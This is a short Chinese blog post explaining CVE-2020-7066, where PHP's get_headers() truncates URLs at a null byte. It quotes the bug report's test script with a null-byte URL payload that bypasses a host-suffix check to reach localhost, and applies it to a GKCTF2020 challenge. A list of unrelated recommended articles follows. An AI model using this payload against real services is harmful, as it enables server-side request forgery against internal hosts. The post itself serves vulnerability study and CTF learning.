cve-2020-7066简单解析
翻译自:
https://bugs.php.net/bug.php?id=79329
get_headers()会截断URL中空字符后的内容
这是在php7.3中发现的 ,但是一直有这个漏洞
测试脚本显示这会让恶意脚本获取意外域名的header 。这些header可能泄露敏感信息或者意外地包含攻击者控制的数据。
测试脚本
<?php
// user input
$_GET['url'] = "http://localhost\0.example.com";$host = parse_url($_GET['url'], PHP_URL_HOST);
if (substr($host, -12) !== '.example.com') {die();
}
$headers = get_headers($_GET['url']);
var_dump($headers);
预期结果:
Warning: get_headers() expects parameter 1 to be a valid path, string given in php shell code on line 1
NULL
实际结果:
headers from http://localhost
例题:
GKCTF2020-CVE版签到
换成127.0.0.123 就反弹flag了
cve-2020-7066简单解析相关推荐
- 什么是cve什么是cwe_什么是CVE 2020 0601又名Curveball,为何如此危险
什么是cve什么是cwe Monday the 13th of January Brian Krebs published on his blog that he had sources tellin ...
- 插件化框架DL源码的简单解析
目前行业内已经有较多的插件化实现方案.本文主要对DL(DynamicLoadApk)这一个开源的侵入式插件化方案进行简单分析.因为Service组件插件化的实现逻辑和Activity大体相似,所以在这 ...
- java 解析xls 文件_java简单解析xls文件的方法示例【读取和写入】
本文实例讲述了java简单解析xls文件的方法.分享给大家供大家参考,具体如下: 读取: import java.io.*; import jxl.*; import jxl.write.*; imp ...
- ECMAScript 2015~2020 语法全解析
ECMAScript 2015~2020 语法全解析 ( ES6 ~ ES11 ) . 快速上手 => es.xiecheng.live
- [ 转载 ] Java基础10--关于Object类下所有方法的简单解析
关于Object类下所有方法的简单解析 类Object是类层次结构的根类,是每一个类的父类,所有的对象包括数组,String,Integer等包装类,所以了解Object是很有必要的,话不多说,我们直 ...
- java在线打开xml文件_java实现简单解析XML文件功能示例
本文实例讲述了java实现简单解析XML文件功能.分享给大家供大家参考,具体如下: package demo; import java.io.File; import java.io.IOExcept ...
- java:AXIS调用webService接口,返回String类型xml,并用dom4j简单解析xml
一.使用axis调用webService接口,返回String类型xml 1.导入axis依赖 2.直接贴代码 /*** 调用webservice接口的方法,并返回String类型的xml* @par ...
- HTML-HTML协议简单解析
HTML-HTML协议简单解析 在浏览器访问一个地址: 127.0.0.1:7890/html/html.htm //代表访问当地服务器路径下的/html的html.htm文件 客户端发送的请求命令是 ...
- C++生成LNK文件及LNK文件简单解析
C++生成LNK文件及LNK文件简单解析 话不多说,直接上代码吧. 生成快捷方式代码: int CreateLnk(const wchar_t* TARGET, const wchar_t* LNKF ...
- 大数据培训课程数据清洗案例实操-简单解析版
数据清洗(ETL) 在运行核心业务MapReduce程序之前,往往要先对数据进行清洗,清理掉不符合用户要求的数据.清理的过程往往只需要运行Mapper程序,不需要运行Reduce程序.大数据培训 数据 ...
最新文章
- 你要的用户画像实践来了!
- js符号转码_js传特殊字符到controller (java)的转码问题
- spark中累加器的使用(转)
- CSS Reset(css的初始化)
- ARouter使用随记
- 使用Adreno Profiler分析android游戏
- 火车站(codevs 2287)
- mysql all和distinct_mysql distinct 使用实例(过滤多余的重复记录)
- GUI版Hex合并和Hex转换工具-HexMergeTool 取代hex2bin命令行工具
- 统信UOS系统怎么下载QQ音乐
- easyExcel 导出 excel 自定义表头
- iphone计算机怎么显示电话,苹果手机最近通话记录不显示怎么恢复
- SLAM中的李群和李代数
- SAP FICO CBS接口-银企直连联盟收款功能开发说明书(包括测试样例、程序代码仅作参考,不保证一定可以运行)
- Nebula Exchange 从Hive导入 NoSuchMethodError
- java抽象类实例化_抽象类能实例化吗
- Wireshark使用详解
- anki卡片浏览器_Anki Guide by Corkine
- VIVO可能在某一段时间内手机充电数据线上并没有ID脚
- 通过百度地图把经纬度转化成城市名